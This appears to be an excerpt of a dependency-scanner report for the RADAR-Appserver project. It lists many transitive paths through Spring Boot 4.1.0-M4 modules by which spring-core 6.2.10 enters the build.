Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
